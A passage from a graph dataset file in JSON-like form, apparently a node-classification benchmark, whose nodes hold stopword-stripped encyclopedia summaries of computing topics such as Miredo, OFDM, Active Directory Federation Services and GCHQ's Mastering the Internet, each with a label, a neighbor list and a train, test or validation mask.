operators classified nullary operands unary 1 operand binary 2 operands ternary 3 operands etc computer programming languages definitions operator operand almost mathematics computing operand part computer instruction specifies data manipulated operated time representing data computer instruction describes operation add multiply x operand operands one specify x operate well value x. additionally assembly language operand value argument instruction named mnemonic operates operand may processor register memory address literal constant label simple example x86 architecture mov ds ax value register operand codice_1 moved codice_2 register codice_3 depending instruction may zero one two operands",
    "neighbors": [
      1029,
      1798,
      4742,
      7173,
      8715,
      8716,
      6926,
      5655,
      8352,
      10786,
      6821,
      5415,
      10796,
      1463,
      9911,
      6596,
      9028,
      8262,
      8136,
      8523,
      3157,
      730,
      604,
      477,
      1502,
      6247,
      5358,
      240,
      1776,
      4465,
      499,
      372,
      7281,
      7421
    ],
    "mask": "Train"
  },
  {
    "node_id": 8144,
    "label": 4,
    "text": "Miredo:miredo miredo teredo tunneling client designed allow full ipv6 connectivity computer systems ipv4-based internet direct native connection ipv6 network miredo included many linux bsd distributions also available recent versions mac os x discontinued includes working implementations released terms gnu general public license miredo free software",
    "neighbors": [
      5469,
      2045,
      5470,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 8145,
    "label": 7,
    "text": "ActiveCampaign:activecampaign activecampaign email marketing marketing automation sales automation crm software platform small-to-mid-sized businesses based chicago illinois activecampaign founded jason vandeboom 2003 started consulting firm on-premise software provider helping small midsize businesses automate marketing tasks manage contacts 2013 company transitioned on-premise software software service business focused marketing sales automation 2018 activecampaign 60,000 clients 60 million recurring revenue 2016 activecampaign raised 20 million silversmith capital partners activecampaign headquartered chicago offices indianapolis sydney australia activecampaign provides cloud-based marketing sales automation software features email marketing lead scoring web analytics crm platform live chat messaging platform called conversations software uses customer data create customized messaging according pc magazine activecampaign offers lot features relatively low price downside confusing use times thankfully help resources plentiful solutions review pointed users access detailed behavior tracking capabilities well precision marketing options segmentation 2018 activecampaign appeared crain chicago business best places work list inc.com list best workplaces chicago tribune list top midsize workplaces",
    "neighbors": [
      6576
    ],
    "mask": "Test"
  },
  {
    "node_id": 8146,
    "label": 4,
    "text": "Hackers.mu:hackers.mu hackers.mu group developers mauritius focused computer security ietf standards linux open source software adoption worked implementing tls 1.3 linux open source software ietf 100 hackathon part tls working group also prepared high school students google code-in 2016 marked first time mauritius participated 2017 trained another batch high school students would lead first grand prize winner mauritius ietf 101 hackers.mu acted tls 1.3 champions continued work application integration support june 2018 hackers.mu organized hackathon codename operation jask fix sigspoof3 number open source projects july 2018 hackers.mu participated ietf 102 hackathon tls 1.3 champions work inter-operability applications support http 451 additionally active authoring ietf standards rfc 8270",
    "neighbors": [
      7547,
      2558,
      823
    ],
    "mask": "Train"
  },
  {
    "node_id": 8147,
    "label": 2,
    "text": "Revolution_OS:revolution os revolution os 2001 documentary film traces twenty-year history gnu linux open source free software movement directed j. t. s. moore film features interviews prominent hackers entrepreneurs including richard stallman michael tiemann linus torvalds larry augustin eric s. raymond bruce perens frank hecker brian behlendorf film begins glimpses raymond linux ipo torvalds idea open source perens stallman sets historical stage early days hackers computer hobbyists code shared freely discusses change came 1978 microsoft co-founder bill gates open letter hobbyists pointedly prodded hobbyists pay stallman relates struggles proprietary software vendors mit artificial intelligence lab leading departure focus development free software gnu project torvalds describes development linux kernel gnu/linux naming controversy linux evolution commercialization raymond stallman clarify philosophy free software versus communism capitalism well development stages linux michael tiemann discusses meeting stallman 1987 getting early version stallman gcc founding cygnus solutions larry augustin describes combining gnu software normal pc create unix-like workstation one third price twice power sun workstation relates early dealings venture capitalists eventual capitalization commodification linux company va linux ipo brian behlendorf one original developers apache http server explains started exchange patches ncsa web server daemon developers led release patchy webserver dubbed apache frank hecker netscape discusses events leading netscape executives releasing source code netscape browser one signal events made open source force reckoned business executives mainstream media public large point validated film release netscape source code eventually became firefox web browser reclaiming large percentage market share microsoft internet explorer film also documents scope first full-scale linuxworld summit conference appearances linus torvalds larry augustin keynote stage much footage film shot silicon valley film appeared several film festivals including south southwest atlanta film video festival boston film festival denver international film festival best documentary savannah film video festival kudzu film festival every review noted historical significance information noticed found production values high presentation history mainly dry even resembling lecture ron wells film threat found film important worthwhile well thought explaining principles free software open source concepts noting failure represent camera debate representatives proprietary software camp wells gave film 4 5 stars tv guide rated film 3 4 stars surprisingly exciting fascinating sharp looking good soundtrack daily variety saw film targeted equally techno-illiterate savvy-hacker crowd educating patting one group head canonizing strong enough enjoyable recommendation negative side new york times faulted film one-sidedness found reliance jargon fairly dense going gave recommendation internet reviews found didactic dull documentary glorifying software anarchy raging microsoft sun lacking follow-through red hat valinux stock 2007 2 peak value lots talking heads toxicuniverse.com noted revolution os blatantly serves infomercial propaganda bearded throwback sixties hacker richard stallman serves movement spiritual leader scandinavian linus torvalds acts mild mannered chief engineer developer linux kernel tim lord reviewing slashdot film interesting worthy viewing misgivings growth free software movement eventual co-option open source movement supposed linux battle microsoft movie quickly hijacked participants film lacks staple documentaries scenes multiple people later analyzed individually participants indeed much back-and-forth linux benefits notably missing w e never shown anyone using linux except unhappy users installfest debate linux vs windows missing showing origin os response proprietary expensive sun dec software hardware growth solely due apache web server lord notes film shows challenge torvalds stallman equally disingenuous remarks linux vs gnu/linux naming issue",
    "neighbors": [
      2560,
      2050,
      1028,
      5644,
      10255,
      5139,
      9237,
      4636,
      4637,
      9245,
      5663,
      10780,
      546,
      3618,
      9257,
      3114,
      5677,
      1584,
      9266,
      7223,
      6718,
      10817,
      8258,
      8772,
      3654,
      5703,
      10822,
      1101,
      10317,
      2134,
      1112,
      3162,
      3674,
      4192,
      2658,
      10851,
      6244,
      9320,
      6763,
      1646,
      8304,
      5747,
      5759,
      11391,
      7810,
      132,
      2180,
      4230,
      6276,
      7812,
      8326,
      9865,
      10382,
      657,
      2195,
      9882,
      11418,
      3229,
      1694,
      6301,
      3744,
      4265,
      4777,
      692,
      10933,
      2233,
      2236,
      6338,
      4803,
      5833,
      8909,
      6352,
      5335,
      3289,
      3802,
      10971,
      3296,
      1761,
      7904,
      9953,
      10464,
      3817,
      4841,
      6890,
      7913,
      237,
      7920,
      8436,
      5369,
      6910,
      7938,
      4360,
      1813,
      5397,
      2332,
      10012,
      802,
      5410,
      292,
      1833,
      7980,
      815,
      2864,
      6962,
      5430,
      823,
      6968,
      3395,
      3911,
      10063,
      4437,
      11095,
      3422,
      863,
      865,
      2914,
      10088,
      8554,
      9579,
      6508,
      7020,
      10091,
      1394,
      1396,
      11643,
      1406,
      3969,
      3458,
      7555,
      8582,
      10631,
      11654,
      7561,
      394,
      4493,
      10127,
      1939,
      916,
      11155,
      1431,
      9637,
      935,
      4011,
      11180,
      9646,
      1456,
      5555,
      9148,
      9660,
      9151,
      10687,
      9665,
      8644,
      4040,
      457,
      7626,
      5067,
      4561,
      3030,
      5078,
      2010,
      6622,
      9696,
      8673,
      1506,
      11232,
      8676,
      2021,
      9190,
      10732,
      1007,
      8177,
      1524,
      2036,
      2550,
      5620,
      3068
    ],
    "mask": "None"
  },
  {
    "node_id": 8148,
    "label": 4,
    "text": "Disinfectant_(software):disinfectant software disinfectant popular antivirus software program classic mac os originally released freeware john norstad spring 1989 disinfectant featured system extension would detect virus infections application users could scan remove viruses new versions disinfectant subsequently released detect additional viruses bob levitus praised recommended disinfectant 1992 may 1998 norstad retired disinfectant citing new danger posed macro viruses disinfectant detect inability single individual maintain program caught",
    "neighbors": [
      576,
      7515,
      2213,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8149,
    "label": 8,
    "text": "Fuse_Mediation_Router:fuse mediation router fuse mediation router open source tool integrating services using enterprise integration patterns based apache camel use enterprise organizations certified productized fully supported people wrote code fuse mediation router uses standard method notation go diagram implementation without coding fuse mediation router rule-based routing process mediation engine combines ease basic pojo development clarity standard enterprise integration patterns deployed inside container used stand-alone works directly kind transport messaging model rapidly integrate existing services applications fuse mediation router part red hat jboss fuse fusesource offers graphical eclipse-based tooling apache camel download",
    "neighbors": [
      1280,
      10020,
      4107,
      5612,
      5677,
      11339,
      7983,
      9455
    ],
    "mask": "Test"
  },
  {
    "node_id": 8150,
    "label": 4,
    "text": "High-water_mark_(computer_security):high-water mark computer security high-water mark access control introduced clark weissmann 1969 pre-dates bell–lapadula security model whose first volume appeared 1972 high-water mark object less user security level opened object relabeled reflect highest security level currently open hence name practical effect high-water mark gradual movement objects towards highest security level system user writing confidential document checks unclassified dictionary dictionary becomes confidential user b writing secret report checks spelling word dictionary becomes secret finally user c assigned assemble daily intelligence briefing top secret level reference dictionary makes dictionary top secret low-water mark extension biba model biba model no-write-up no-read-down rules enforced model rules exactly opposite rules bell-la padula model low-water mark model read permitted subject label reading degraded object label classified floating label security models",
    "neighbors": [
      3360,
      3616,
      8259,
      2737,
      10968,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8151,
    "label": 3,
    "text": "Do!_Run_Run:run run run run known super pierrot スーパーピエロ japan fourth final incarnation mr universal video game mascot returning mr. roots clown bouncing powerball hurl monsters mr. runs along playfield picking dots leaving line behind player encouraged create closed sections precariously balanced log traps rolled downslope crushing enemies resulting game somewhat cross mr congo bongo pac-man qix title reference song da doo ron ron goal run run rack points completing screens screen completed whenever fruits/dots eaten regular monsters alpha-monsters sidekicks defeated using rope follows mr. inscribe dots convert cherries familiar fruit mr. collect cherries worth points dots eating restores powerball quickly eating dots would time mr. inscribes fruit progress higher tier dots become cherries cherries become apples apples become lemons lemons become pineapples eating dot awards 10 points 1/16 powerball recharge eating pineapple worth 160 points 1/4 powerball recharge players additionally encouraged inscribe sections playfield letters e x r constant feature mr games randomly one inscribed fruits turn flashing letter spot corresponding movement alpha-monster top screen mr. runs spot monster sporting letter release top screen three blue henchmen resemble three ghost-like monsters original mr chase mr. defeating alpha-monster lock letter 5 letters earned player earns extra life well progressing next stage also earn 5,000 point bonus points also awarded defeating monsters directly firing powerball monster awards 500 points consumes powerball needs replenished eating fruit points earned powerball bounces surface bounce raises bonus 500 points maximum 3000 points earned smashing monsters rolling log earns 1000 points possible roll multiple monsters earn cumulative bonus 500 per extra monster 1500 2nd 2000 3rd etc. apparently 10,000 point bonus smashing 5 monsters like mr. games monsters nameless except alpha-monsters defy easy description two types monsters attempt foil clown efforts green clam-like monster blue snake-like monster neither particularly sophisticated although clam monsters seemingly clever moments bumble path way powerball blue snakes linger long direct path convert fireball charge across playing field state immune powerball common arcade games contact monsters instantly fatal mr. shown electrocuted complete visible flashing skeleton reappearing black skeleton time stage elapses music changes surviving monsters convert different form clam monsters become blue armored spines snake monsters essentially become different looking snake monsters speed monster willingness chase mr. major changes fairly easily eluded long player simply run away instead mr. climb terrain closely chased monsters lose lot time changing levels playfield whereas mr. gets slight speed going downslope short duration music resumes monsters transform back old selves pattern transformation repeating alpha-monsters summoned letter circle released three henchmen henchmen home mr. typically precede alpha-monster killing alpha-monster rids playfield henchmen although easier lure four path log smash alpha-monsters also released every time score reaches increments 5,000 points unless already alpha-monster playfield configured rom occur infrequently bonus diamond worth 10,000 points show manner letter circles fruit inscribed player collects stage ends awarded bonus credit fashion original mr versions released msx 1987 amiga atari st 1990 ports amstrad cpc commodore 64 zx spectrum cancelled development",
    "neighbors": [
      11373,
      9006,
      9110,
      4312,
      3039
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8152,
    "label": 4,
    "text": "Alec_Muffett:alec muffett alec david edward muffett born april 22 1968 anglo-american internet-security evangelist architect software engineer principally known work crack original unix password cracker cracklib password-integrity testing library also active open-source software community muffett joined sun microsystems 1992 working initially systems administrator rose “ ranks ” become principal engineer security position held retrenched many others 2009 shortly oracle acquired sun sun one researchers worked factorization 512 bit rsa challenge number rsa-155 successfully factorized august 1999 muffett also worked sun md5 hash algorithm introduced solaris 9 update 2 new algorithm drew muffett work pluggable crypt implemented many different languages example python algorithm uses complete text famous soliloquy shakespeare hamlet question ... constant data muffett justified choice text exposes programmers shakespeare got good thing sabbatical year muffett began work mine project lead developer subsequently became director consultant green lane security also consults surevine became director open rights group october 2011 muffett blogs professionally computer world unscrewing security personally dropsafe numerous publications credit besides frequent presenter technical conferences muffett co-inventor darren moffat casper dik patent method apparatus implementing pluggable password obscuring mechanism united states patent 7,249,260 issued june 12 2003 2015 muffett named one top 6 influential security thinkers sc magazine october year coauthored rfc 7686 .onion special-use domain name jacob applebaum recently muffett assisted new york times creation tor onion site following created onion wikipedia site accessible tor previously muffett worked software engineer facebook leading team added end-to-end encryption facebook messenger currently works principal engineer infrastructure security deliveroo",
    "neighbors": [
      3937,
      8554,
      8612,
      9665
    ],
    "mask": "Test"
  },
  {
    "node_id": 8153,
    "label": 3,
    "text": "Linux_Kernel_Library:linux kernel library linux kernel library project started octavian purdila university politehnica bucharest ixia sponsored laboratories ixlabs project goal use linux kernel linkable library non-static functions kernel called external program first application use lkl lklftpd ftp daemon serves files disk images containing file system supported linux kernel",
    "neighbors": [
      7364,
      11221
    ],
    "mask": "None"
  },
  {
    "node_id": 8154,
    "label": 1,
    "text": "IBM_Spufi:ibm spufi sql processor using file input database facility invented ibm interfacing db2 system accessed within tso ispf db2i primary option menu spufi allows direct input sql commands tso environment rather embedded within program set spufi defaults unlikely changed values similar across installations typical example shown although essentially interactive tool spufi operates using pair datasets dataset z/os equivalent file operating systems main spufi screen one specifies input dataset output dataset specified reused repeatedly user moves main screen standard ispf editor opened input dataset point user enter required sql statements using familiar editor exiting editor main spufi screen reappears user moves time contents input dataset executed results placed output dataset ispf editor opened read-only browse mode output user reads results interactive use spufi continues around steps summary cycle spufi uses normal datasets commands output possible pre-populate commands operate output accessing datasets independently spufi tool using datasets also means possibly-complicated set sql commands persist session session rather lost user exits tool simple query comments typical result type query output dataset contains resultant rows case select along additional details like number rows affected sql query sqlcode returned execution sql query case sql errors details error given db2 developer guide craig mullins sams publishing",
    "neighbors": [
      2089,
      909,
      10413,
      2901,
      5562,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 8155,
    "label": 4,
    "text": "Peter_G._Neumann:peter g. neumann peter gabriel neumann born 1932 computer-science researcher worked multics operating system 1960s edits risks digest columns acm software engineering notes communications acm founded acm sigsoft fellow acm ieee aaas 1950 1958 neumann studied harvard university 1961 granted ph.d. completing fulbright scholarship germany 1958–1960 student harvard two-hour breakfast albert einstein 8 november 1952 discussing simplicity design neumann worked bell labs 1960 1970 worked sri international menlo park california since 1971 risks mailing list neumann best known provably secure operating system psos neumann worked dorothy e. denning 1980s develop computer intrusion detection system known ides model later computer security software neumann long served moderator risks digest member accurate project neumann founding editor acm software engineering notes sen fellow acm",
    "neighbors": [
      7107,
      9283,
      10372,
      3694,
      5492,
      6772,
      1783,
      5245,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8156,
    "label": 4,
    "text": "Mastering_the_Internet:mastering internet mastering internet mti mass surveillance project led british communications intelligence agency government communications headquarters gchq budgeted £1 billion according reports register sunday times early may 2009 contracts total value £200m already awarded suppliers responding reports gchq issued press release countering claims mass surveillance stating gchq developing technology enable monitoring internet use phone calls britain target everyone uk however 2013 mass surveillance disclosures revealed gchq gathers raw information without filtering communications british citizens web part mastering internet programme mastering internet mti project british government part interception modernisation programme imp system described 2009 register sunday times replacement scrapped plans single central database involving thousands dpi black boxes various internet service providers association gchq base cheltenham funded single intelligence account budget £1.6 bn including £200m contract lockheed martin contract bae systems detica 2013 system capable copying signals 200 fibre-optic cables physical points entry great britain early 2007 john adams chief canada intelligence agency communications security establishment told parliament canada plans five eyes master internet cooperation nsa allies 2013 guardian provided specific details financial contributions made u.s. national security agency nsa mastering internet part five eyes alliance several english-speaking western democracies according documents leaked edward snowden nsa paid gchq £17.2 million towards running programme",
    "neighbors": [
      3495,
      4937,
      1930,
      7887,
      1169,
      10417,
      4595,
      7893,
      8567
    ],
    "mask": "Test"
  },
  {
    "node_id": 8157,
    "label": 2,
    "text": "Nat_Friedman:nat friedman nathaniel dourif friedman born august 6 1977 american technology executive 1996 freshman massachusetts institute technology friedman befriended miguel de icaza linuxnet irc network friedman created discuss linux intern microsoft friedman worked iis web server mit studied computer science mathematics graduated bachelor science 1999 friedman co-founded ximian originally called international gnome support helix code de icaza develop applications infrastructure gnome project de icaza started aim producing free software desktop environment company later bought novell 2003 novell friedman chief technology strategy officer open source january 2010 launched hula project began release components novell netmail open source tenure novell began effort migrate 6,000 employees away microsoft windows suse linux microsoft office openoffice.org friedman final project departure work suse studio sabbatical friedman created hosted podcast called hacker medley may 2011 friedman de icaza together founded xamarin friedman made ceo company created offer commercial support mono project de icaza initiated ximian provide free software implementation microsoft .net software stack xamarin focused continuing develop mono monodevelop marketing cross-platform xamarin sdk developers targeting mobile computing devices video game consoles 2016 friedman became employee microsoft upon acquisition xamarin rose position corporate vice president developer services june 2018 announcement microsoft 7.5 billion acquisition github companies simultaneously announced friedman would become github new ceo github co-founder then-current ceo chris wanstrath leading search wanstrath replacement since august 2017 friedman assumed role ceo 29th october 2018",
    "neighbors": [
      225,
      5612,
      6797,
      3791,
      1328,
      4402,
      2387,
      3573,
      11221,
      823,
      7450,
      4439
    ],
    "mask": "Test"
  },
  {
    "node_id": 8158,
    "label": 9,
    "text": "JDOM:jdom jdom open-source java-based document object model xml designed specifically java platform take advantage language features jdom integrates document object model dom simple api xml sax supports xpath xslt uses external parsers build documents jdom developed jason hunter brett mclaughlin starting march 2000 part java community process jsr 102 though effort since abandoned suppose file foo.xml contains xml document one parse xml file tree java objects jdom like case want create document object file input stream create document object element converse one construct tree elements generate xml file following example",
    "neighbors": [
      4960,
      8262,
      5612,
      5677,
      7983,
      502,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 8159,
    "label": 2,
    "text": "Active_Directory_Federation_Services:active directory federation services active directory federation services ad fs software component developed microsoft run windows server operating systems provide users single sign-on access systems applications located across organizational boundaries uses claims-based access-control authorization model maintain application security implement federated identity claims-based authentication involves authenticating user based set claims user identity contained trusted token token often issued signed entity able authenticate user means trusted entity claims-based authentication part active directory services ad fs identity federation established two organizations establishing trust two security realms federation server one side accounts side authenticates user standard means active directory domain services issues token containing series claims user including identity side resources side another federation server validates token issues another token local servers accept claimed identity allows system provide controlled access resources services user belongs another security realm without requiring user authenticate directly system without two systems sharing database user identities passwords practice user might typically perceive approach follows ad fs integrates active directory domain services using identity provider ad fs interact ws-* saml 2.0-compliant federation services federation partners",
    "neighbors": [
      929,
      8227,
      3303,
      4074,
      8174,
      756,
      820,
      4505,
      90,
      6811
    ],
    "mask": "Test"
  },
  {
    "node_id": 8160,
    "label": 5,
    "text": "Orthogonal_frequency-division_multiplexing:orthogonal frequency-division multiplexing telecommunications orthogonal frequency-division multiplexing ofdm method encoding digital data multiple carrier frequencies ofdm developed popular scheme wideband digital communication used applications digital television audio broadcasting dsl internet access wireless networks power line networks 4g mobile communications coded orthogonal frequency-division multiplexing cofdm forward error correction convolutional coding time/frequency interleaving applied signal transmitted done overcome errors mobile communication channels affected multipath propagation doppler effects cofdm introduced alard 1986 digital audio broadcasting eureka project 147 practice ofdm become used combination coding interleaving terms cofdm ofdm co-apply common applications ofdm frequency-division multiplexing fdm scheme used digital multi-carrier modulation method ofdm introduced chang bell labs 1966 numerous closely spaced orthogonal subcarrier signals overlapping spectra emitted carry data demodulation based fast fourier transform algorithms ofdm improved weinstein ebert 1971 introduction guard interval providing better orthogonality transmission channels affected multipath propagation subcarrier signal modulated conventional modulation scheme quadrature amplitude modulation phase-shift keying low symbol rate maintains total data rates similar conventional single-carrier modulation schemes bandwidth main advantage ofdm single-carrier schemes ability cope severe channel conditions example attenuation high frequencies long copper wire narrowband interference frequency-selective fading due multipath without complex equalization filters channel equalization simplified ofdm may viewed using many slowly modulated narrowband signals rather one rapidly modulated wideband signal low symbol rate makes use guard interval symbols affordable making possible eliminate intersymbol interference isi use echoes time-spreading analog television visible ghosting blurring respectively achieve diversity gain i.e signal-to-noise ratio improvement mechanism also facilitates design single frequency networks sfns several adjacent transmitters send signal simultaneously frequency signals multiple distant transmitters may re-combined constructively sparing interference traditional single-carrier system following list summary existing ofdm-based standards products details see usage section end article ofdm-based multiple access technology ofdma also used several 4g pre-4g cellular networks mobile broadband standards next generation wlan advantages disadvantages listed discussed characteristics principles operation section conceptually ofdm specialized frequency-division multiplexing fdm method additional constraint subcarrier signals within communication channel orthogonal one another ofdm subcarrier frequencies chosen subcarriers orthogonal meaning cross-talk sub-channels eliminated inter-carrier guard bands required greatly simplifies design transmitter receiver unlike conventional fdm separate filter sub-channel required orthogonality requires subcarrier spacing formula_1 hertz seconds useful symbol duration receiver-side window size k positive integer typically equal 1 stipulates carrier frequency undergoes k complete cycles per symbol period previous carrier therefore n subcarriers total passband bandwidth b ≈ n ·δ f hz orthogonality also allows high spectral efficiency total symbol rate near nyquist rate equivalent baseband signal i.e near half nyquist rate double-side band physical passband signal almost whole available frequency band used ofdm generally nearly 'white spectrum giving benign electromagnetic interference properties respect co-channel users ofdm requires accurate frequency synchronization receiver transmitter frequency deviation subcarriers longer orthogonal causing inter-carrier interference ici i.e. cross-talk subcarriers frequency offsets typically caused mismatched transmitter receiver oscillators doppler shift due movement doppler shift alone may compensated receiver situation worsened combined multipath reflections appear various frequency offsets much harder correct effect typically worsens speed increases important factor limiting use ofdm high-speed vehicles order mitigate ici scenarios one shape subcarrier order minimize interference resulting non-orthogonal subcarriers overlapping example low-complexity scheme referred wcp-ofdm weighted cyclic prefix orthogonal frequency-division multiplexing consists using short filters transmitter output order perform potentially non-rectangular pulse shaping near perfect reconstruction using single-tap per subcarrier equalization ici suppression techniques usually increase drastically receiver complexity orthogonality allows efficient modulator demodulator implementation using fft algorithm receiver side inverse fft sender side although principles benefits known since 1960s ofdm popular wideband communications today way low-cost digital signal processing components efficiently calculate fft time compute inverse-fft fft transform take less time symbol example dvb-t means computation done less -point fft may approximated computational demand approximately scales linearly fft size double size fft needs double amount time vice versa comparison intel pentium iii cpu 1.266 ghz able calculate fft using fftw intel pentium 1.6 ghz intel core duo 3.0 ghz one key principle ofdm since low symbol rate modulation schemes i.e. symbols relatively long compared channel time characteristics suffer less intersymbol interference caused multipath propagation advantageous transmit number low-rate streams parallel instead single high-rate stream since duration symbol long feasible insert guard interval ofdm symbols thus eliminating intersymbol interference guard interval also eliminates need pulse-shaping filter reduces sensitivity time synchronization problems cyclic prefix transmitted guard interval consists end ofdm symbol copied guard interval guard interval transmitted followed ofdm symbol reason guard interval consists copy end ofdm symbol receiver integrate integer number sinusoid cycles multipaths performs ofdm demodulation fft standards ultrawideband interest transmitted power cyclic prefix skipped nothing sent guard interval receiver mimic cyclic prefix functionality copying end part ofdm symbol adding beginning portion effects frequency-selective channel conditions example fading caused multipath propagation considered constant flat ofdm sub-channel sub-channel sufficiently narrow-banded i.e. number sub-channels sufficiently large makes frequency domain equalization possible receiver far simpler time-domain equalization used conventional single-carrier modulation ofdm equalizer multiply detected subcarrier fourier coefficient ofdm symbol constant complex number rarely changed value fundamental level simpler digital equalizers better require fewer operations translates fewer round-off errors equalizer round-off errors viewed numerical noise inevitable differential modulation dpsk dqpsk applied subcarrier equalization completely omitted since non-coherent schemes insensitive slowly changing amplitude phase distortion sense improvements fir equalization using ffts partial ffts leads mathematically closer ofdm ofdm technique easier understand implement sub-channels independently adapted ways varying equalization coefficients switching different qam constellation patterns error-correction schemes match individual sub-channel noise interference characteristics subcarriers ofdm symbols may carry pilot signals measurement channel conditions i.e. equalizer gain phase shift subcarrier pilot signals training symbols preambles may also used time synchronization avoid intersymbol interference isi frequency synchronization avoid inter-carrier interference ici caused doppler shift ofdm initially used wired stationary wireless communications however increasing number applications operating highly mobile environments effect dispersive fading caused combination multi-path propagation doppler shift significant last decade research done equalize ofdm transmission doubly selective channels ofdm invariably used conjunction channel coding forward error correction almost always uses frequency and/or time interleaving frequency subcarrier interleaving increases resistance frequency-selective channel conditions fading example part channel bandwidth fades frequency interleaving ensures bit errors would result subcarriers faded part bandwidth spread bit-stream rather concentrated similarly time interleaving ensures bits originally close together bit-stream transmitted far apart time thus mitigating severe fading would happen travelling high speed however time interleaving little benefit slowly fading channels stationary reception frequency interleaving offers little benefit narrowband channels suffer flat-fading whole channel bandwidth fades time reason interleaving used ofdm attempt spread errors bit-stream presented error correction decoder decoders presented high concentration errors decoder unable correct bit errors burst uncorrected errors occurs similar design audio data encoding makes compact disc cd playback robust classical type error correction coding used ofdm-based systems convolutional coding often concatenated reed-solomon coding usually additional interleaving top time frequency interleaving mentioned two layers coding implemented choice reed-solomon coding outer error correction code based observation viterbi decoder used inner convolutional decoding produces short error bursts high concentration errors reed-solomon codes inherently well suited correcting bursts errors newer systems however usually adopt near-optimal types error correction codes use turbo decoding principle decoder iterates towards desired solution examples error correction coding types include turbo codes ldpc codes perform close shannon limit additive white gaussian noise awgn channel systems implemented codes concatenated either reed-solomon example mediaflo system bch codes dvb-s2 system improve upon error floor inherent codes high signal-to-noise ratios resilience severe channel conditions enhanced information channel sent return-channel based feedback information adaptive modulation channel coding power allocation may applied across subcarriers individually subcarrier latter case particular range frequencies suffers interference attenuation carriers within range disabled made run slower applying robust modulation error coding subcarriers term dmt denotes ofdm-based communication systems adapt transmission channel conditions individually subcarrier means so-called bit-loading examples adsl vdsl upstream downstream speeds varied allocating either fewer carriers purpose forms rate-adaptive dsl use feature real time bitrate adapted co-channel interference bandwidth allocated whichever subscriber needs ofdm primary form considered digital modulation technique multi-user channel access method since used transferring one bit stream one communication channel using one sequence ofdm symbols however ofdm combined multiple access using time frequency coding separation users orthogonal frequency-division multiple access ofdma frequency-division multiple access achieved assigning different ofdm sub-channels different users ofdma supports differentiated quality service assigning different number subcarriers different users similar fashion cdma thus complex packet scheduling media access control schemes avoided ofdma used ofdma also candidate access method ieee 802.22 wireless regional area networks wran project aims designing first cognitive radio-based standard operating vhf-low uhf spectrum tv spectrum multi-carrier code division multiple access mc-cdma also known ofdm-cdma ofdm combined cdma spread spectrum communication coding separation users co-channel interference mitigated meaning manual fixed channel allocation fca frequency planning simplified complex dynamic channel allocation dca schemes avoided ofdm-based wide-area broadcasting receivers benefit receiving signals several spatially dispersed transmitters simultaneously since transmitters destructively interfere limited number subcarriers whereas general actually reinforce coverage wide area beneficial many countries permits operation national single-frequency networks sfn many transmitters send signal simultaneously channel frequency sfns use available spectrum effectively conventional multi-frequency broadcast networks mfn program content replicated different carrier frequencies sfns also result diversity gain receivers situated midway transmitters coverage area increased outage probability decreased comparison mfn due increased received signal strength averaged subcarriers although guard interval contains redundant data means reduces capacity ofdm-based systems broadcasting systems deliberately use long guard interval order allow transmitters spaced farther apart sfn longer guard intervals allow larger sfn cell-sizes rule thumb maximum distance transmitters sfn equal distance signal travels guard interval — instance guard interval 200 microseconds would allow transmitters spaced 60 km apart single frequency network form transmitter macrodiversity concept used dynamic single-frequency networks dsfn sfn grouping changed timeslot timeslot ofdm may combined forms space diversity example antenna arrays mimo channels done ieee 802.11 wireless lan standards ofdm signal exhibits high peak-to-average power ratio papr independent phases subcarriers mean often combine constructively handling high papr requires non-linearity signal chain cause intermodulation distortion linearity requirement demanding especially transmitter rf output circuitry amplifiers often designed non-linear order minimise power consumption practical ofdm systems small amount peak clipping allowed limit papr judicious trade-off consequences however transmitter output filter required reduce out-of-band spurs legal levels effect restoring peak levels clipped clipping effective way reduce papr although spectral efficiency ofdm attractive terrestrial space communications high papr requirements far limited ofdm applications terrestrial systems crest factor cf db ofdm system n uncorrelated subcarriers cf crest factor db subcarrier cf 3.01 db sine waves used bpsk qpsk modulation example dvb-t signal 2k mode composed 1705 subcarriers qpsk-modulated giving crest factor 35.32 db many crest factor reduction techniques developed dynamic range required fm receiver dab require comparison extra bit per sample increases dynamic range performance communication system measured terms power efficiency bandwidth efficiency power efficiency describes ability communication system preserve bit error rate ber transmitted signal low power levels bandwidth efficiency reflects efficiently allocated bandwidth used defined throughput data rate per hertz given bandwidth large number subcarriers used bandwidth efficiency multicarrier system ofdm using optical fiber channel defined factor 2 two polarization states fiber formula_9 symbol rate giga symbol per second gsps formula_10 bandwidth ofdm signal saving bandwidth using multicarrier modulation orthogonal frequency division multiplexing bandwidth multicarrier system less comparison single carrier system hence bandwidth efficiency multicarrier system larger single carrier system 1 dbm increase receiver power get 76.7 improvement bandwidth efficiency using multicarrier transmission technique section describes simple idealized ofdm system model suitable time-invariant awgn channel ofdm carrier signal sum number orthogonal subcarriers baseband data subcarrier independently modulated commonly using type quadrature amplitude modulation qam phase-shift keying psk composite baseband signal typically used modulate main rf carrier formula_11 serial stream binary digits inverse multiplexing first demultiplexed formula_12 parallel streams one mapped possibly complex symbol stream using modulation constellation qam psk etc. note constellations may different streams may carry higher bit-rate others inverse fft computed set symbols giving set complex time-domain samples samples quadrature-mixed passband standard way real imaginary components first converted analogue domain using digital-to-analogue converters dacs analogue signals used modulate cosine sine waves carrier frequency formula_13 respectively signals summed give transmission signal formula_14 receiver picks signal formula_15 quadrature-mixed baseband using cosine sine waves carrier frequency also creates signals centered formula_16 low-pass filters used reject baseband signals sampled digitised using analog-to-digital converters adcs forward fft used convert back frequency domain returns formula_12 parallel streams converted binary stream using appropriate symbol detector streams re-combined serial stream formula_18 estimate original binary stream transmitter formula_12 subcarriers used subcarrier modulated using formula_20 alternative symbols ofdm symbol alphabet consists formula_21 combined symbols low-pass equivalent ofdm signal expressed formula_23 data symbols formula_12 number subcarriers formula_25 ofdm symbol time subcarrier spacing formula_26 makes orthogonal symbol period property expressed formula_28 denotes complex conjugate operator formula_29 kronecker delta avoid intersymbol interference multipath fading channels guard interval length formula_30 inserted prior ofdm block interval cyclic prefix transmitted signal interval formula_31 equals signal interval formula_32 ofdm signal cyclic prefix thus low-pass signal either real complex-valued real-valued low-pass equivalent signals typically transmitted baseband—wireline applications dsl use approach wireless applications low-pass signal typically complex-valued case transmitted signal up-converted carrier frequency formula_13 general transmitted signal represented ofdm used key features common ofdm-based systems presented following table ofdm 